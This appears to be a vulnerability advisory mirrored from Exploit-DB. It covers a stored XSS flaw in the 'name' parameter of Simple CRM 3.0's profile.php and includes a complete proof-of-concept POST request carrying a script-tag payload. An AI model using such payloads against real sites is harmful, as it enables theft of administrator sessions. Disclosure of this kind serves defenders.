Simple CRM 3.0 - 'name' Stored Cross site scripting (XSS)

vendor:

Simple CRM

by:

Riadh Benlamine (rbn0x00)

8,8

CVSS

HIGH

Stored Cross-site Scripting (XSS)

CWE

Product Name: Simple CRM

Affected Version From: 3.0

Affected Version To: 3.0

Patch Exists: NO

Related CWE: N/A

CPE: a:phpgurukul:simple_crm:3.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Apache2+MariaDB

2021

Simple CRM 3.0 – ‘name’ Stored Cross site scripting (XSS)

Simple CRM suffers from Cross-site scripting, allowing authenticated attackers to obtain administrator cookies. An attacker can exploit this vulnerability by sending a malicious payload in the 'name' parameter of the profile.php page. The payload is then stored in the database and is executed when the page is loaded.

Mitigation:

Input validation should be used to prevent malicious payloads from being stored in the database.

Source

Exploit-DB raw data:

# Exploit Title: Simple CRM 3.0 - 'name' Stored Cross site scripting (XSS)
# Date: 20/06/2021
# Exploit Author: Riadh Benlamine (rbn0x00)
# Vendor Homepage: https://phpgurukul.com/
# Software Link:   https://phpgurukul.com/small-crm-php/
# Version: 3.0
# Category: Webapps
# Tested on: Apache2+MariaDB latest version
# Description : Simple CRM suffers from Cross-site scripting, allowing authenticated attackers to obtain administrator cookies.

Vunlerable page: /crm/profile.php

POC:
----
POST /crm/profile.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------386571683933745493952831205283
Content-Length: 779
Origin: http://localhost
Connection: close
Referer: http://localhost/crm/profile.php
Cookie: PHPSESSID=l0iqlrmehhcasinv0ip09e3ls1
Upgrade-Insecure-Requests: 1

-----------------------------386571683933745493952831205283
Content-Disposition: form-data; name="name"
<script>alert('xss')</script>
-----------------------------386571683933745493952831205283

Content-Disposition: form-data; name="alt_email"

-----------------------------386571683933745493952831205283

Content-Disposition: form-data; name="phone"
0123456789

-----------------------------386571683933745493952831205283

Content-Disposition: form-data; name="gender"
m

-----------------------------386571683933745493952831205283

Content-Disposition: form-data; name="address"

-----------------------------386571683933745493952831205283

Content-Disposition: form-data; name="update"
Update

-----------------------------386571683933745493952831205283--